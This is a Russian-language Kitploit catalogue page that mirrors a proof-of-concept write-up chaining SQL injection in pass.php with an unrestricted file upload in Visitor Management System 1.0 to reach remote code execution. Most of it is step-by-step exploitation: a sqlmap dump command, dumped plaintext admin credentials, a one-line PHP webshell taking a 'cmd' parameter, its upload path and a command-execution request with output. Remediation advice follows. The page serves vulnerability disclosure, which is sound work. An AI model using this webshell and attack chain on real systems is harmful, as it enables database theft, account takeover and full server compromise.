Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/xmyronn/cve-2026-10170-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubxmyronn/cve-2026-10170-rce

CVE-2026-10170-RCE

Доказательство концепции, демонстрирующее SQL-инъекцию и неограниченную загрузку файлов, объединённые для достижения удалённого выполнения кода в Visitor Management System 1.0, включая пошаговую эксплуатацию и рекомендации по устранению уязвимостей.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Visitor Management System 1.0 — SQLi до удалённого выполнения кода (цепочка атак)

Информация об уязвимости

ПолеДетали
ПродуктVisitor Management System
Вендорcode-projects.org
Версия1.0
Классы уязвимостейSQL-инъекция (CWE-89) + неограниченная загрузка файлов (CWE-434)
ID CVEОжидается
Оценка CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Требуемая аутентификацияНизкие привилегии (учётная запись охранника) как точка входа
Затронутые файлы/vms/php/pass.php, /vms/php/admin_user_0.php
Уязвимый параметрphone (POST)

Описание

Visitor Management System 1.0 от code-projects.org уязвим к критической цепочке атак, объединяющей SQL-инъекцию и неограниченную загрузку файлов, что приводит к удалённому выполнению кода.

Злоумышленник с доступом низкого уровня (учётная запись охранника) может использовать SQL-инъекцию в pass.php через POST-параметр phone, чтобы выгрузить всю базу данных — включая учётные данные администратора в открытом виде. Используя извлечённые учётные данные для входа в качестве администратора, злоумышленник может затем загрузить PHP-вебшелл через панель управления пользователями администратора (admin_user_0.php), которая не выполняет проверку типа файла или расширения. Загруженный вебшелл сохраняется в каталоге, доступном через веб, и может быть выполнен напрямую по URL, что приводит к полному удалённому выполнению кода на сервере.

Кроме того, пароли хранятся в базе данных в открытом виде, что означает отсутствие необходимости в подборе хешей после выгрузки данных через SQLi.


Обзор цепочки атак

root@kitploit:~
Вход охранника с низкими привилегиями
        ↓
SQL-инъекция в pass.php (параметр phone)
        ↓
Выгрузка через sqlmap → извлечены учётные данные администратора в открытом виде
        ↓
Вход в качестве администратора (sanjay1:7861)
        ↓
Неограниченная загрузка файлов в admin_user_0.php
        ↓
PHP-вебшелл загружен в /vms/php/folder/
        ↓
RCE через ?cmd=whoami → полный компрометация сервера

Пошаговое доказательство концепции

Шаг 1 — Вход в качестве пользователя с низкими привилегиями (охранник)

Перейдите к приложению VMS и войдите с учётными данными охранника. После входа перейдите на страницу номера телефона:

root@kitploit:~
http://<TARGET>/vms/php/phone_0.php
Screenshot 2026-05-05 034206

Шаг 2 — Подтверждение SQL-инъекции в pass.php

Отправьте одинарную кавычку ' в качестве значения номера телефона. Приложение выдаёт фатальную ошибку MariaDB, раскрывающую исходный запрос и путь к файлу:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '2026-05-05'' at line 1 in 
C:\xampp\htdocs\vms\php\pass.php:9
Stack trace:
#0 C:\xampp\htdocs\vms\php\pass.php(9): mysqli_query(Object(mysqli), 'select * from i...')

Затронутый файл: pass.php, строка 9
Уязвимый параметр: phone (POST)

Screenshot 2026-05-05 034215

sql error Screenshot 2026-05-05 034228


Шаг 3 — Эксплуатация SQLi с помощью sqlmap

Сохраните перехваченный в Burp Suite запрос в файл (sqli.txt) и запустите sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

sqlmap успешно выгружает таблицу login_user из базы данных vms, раскрывая учётные данные в открытом виде для всех пользователей:

root@kitploit:~
Database: vms
Table: login_user
[2 entries]
+----+---------+------------+---------+-------+--------+----------+-----------+
| id | image   | phone      | name    | user  | gender | password | username  |
+----+---------+------------+---------+-------+--------+----------+-----------+
| 1  | <blank> | 8146905071 | sanjay  | guard | male   | 786      | sanjay123 |
| 2  | <blank> | 8146905071 | sanjay1 | admin | male   | 7861     | sanjay1   |
+----+---------+------------+---------+-------+--------+----------+-----------+

Примечание: пароли хранятся в открытом виде — подбор хешей не требуется.

Screenshot 2026-05-05 034316

Шаг 4 — Вход в качестве администратора

Используя извлечённые учётные данные администратора, войдите в панель администратора:

root@kitploit:~
Username: sanjay1
Password: 7861

Теперь доступна полная панель администратора, включая управление сотрудниками, отделами, пользователями администратора и отчётами.

Screenshot 2026-05-05 034353

Шаг 5 — Загрузка PHP-вебшелла через панель пользователей администратора

Перейдите на страницу управления пользователями администратора:

root@kitploit:~
http://<TARGET>/vms/php/admin_user_0.php

Страница содержит поле загрузки файла для изображения профиля. Приложение не выполняет проверку типа файла, не фильтрует расширения и не проверяет MIME-тип.

Заполните форму любыми значениями и загрузите следующий PHP-вебшелл в качестве файла изображения (web2_command.php):

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>
Screenshot 2026-05-05 034416

Шаг 6 — Подтверждение загрузки вебшелла

Перейдите на страницу отображения пользователей администратора:

root@kitploit:~
http://<TARGET>/vms/php/admin_display_0.php

Новая созданная учётная запись администратора видна в таблице. Загруженный вебшелл сохраняется по адресу:

root@kitploit:~
http://<TARGET>/vms/php/folder/web2_command.php
Screenshot 2026-05-05 034429

Шаг 7 — Удалённое выполнение кода

Выполните произвольные системные команды через вебшелл:

root@kitploit:~
http://<TARGET>/vms/php/folder/web2_command.php?cmd=whoami

Результат: сервер возвращает текущего системного пользователя, подтверждая полное удалённое выполнение кода:

root@kitploit:~
desktop-g1i9np3\dell
Screenshot 2026-05-05 034438

Воздействие

  • Полная компрометация базы данных — все таблицы выгружены через SQLi, включая учётные данные в открытом виде
  • Захват учётной записи администратора — пароли в открытом виде не требуют подбора
  • Удалённое выполнение кода — произвольные команды ОС выполняются от имени пользователя веб-сервера
  • Полная компрометация сервера — полный контроль над базовым хостом
  • Хранение паролей в открытом виде — усиливает воздействие SQLi, учётные данные немедленно пригодны к использованию

Сводка затронутых файлов

ФайлУязвимость
/vms/php/pass.phpSQL-инъекция через POST-параметр phone
/vms/php/admin_user_0.phpНеограниченная загрузка файлов — отсутствие проверки расширения или MIME
/vms/php/folder/Каталог хранения вебшеллов — доступен через веб, без ограничений

Устранение

Для SQL-инъекции:

root@kitploit:~
$stmt = $conn->prepare("SELECT * FROM login_user WHERE phone = ?");
$stmt->bind_param("s", $phone);
$stmt->execute();

Для загрузки файлов:

  • Используйте белый список разрешённых расширений (только jpg, png, gif)
  • Проверяйте MIME-тип на стороне сервера
  • Храните загруженные файлы вне веб-корня
  • Переименовывайте загруженные файлы в случайные строки

Для хранения паролей:

  • Используйте password_hash() и password_verify() — никогда не храните пароли в открытом виде

Ссылки

  • Домашняя страница вендора
  • CWE-89: SQL-инъекция
  • CWE-434: Неограниченная загрузка файла с опасным типом
  • Шпаргалка OWASP по загрузке файлов

Обнаружитель

  • Исследователь: Imad Alvi
  • VulDB: imad alvi
Скачать инструмент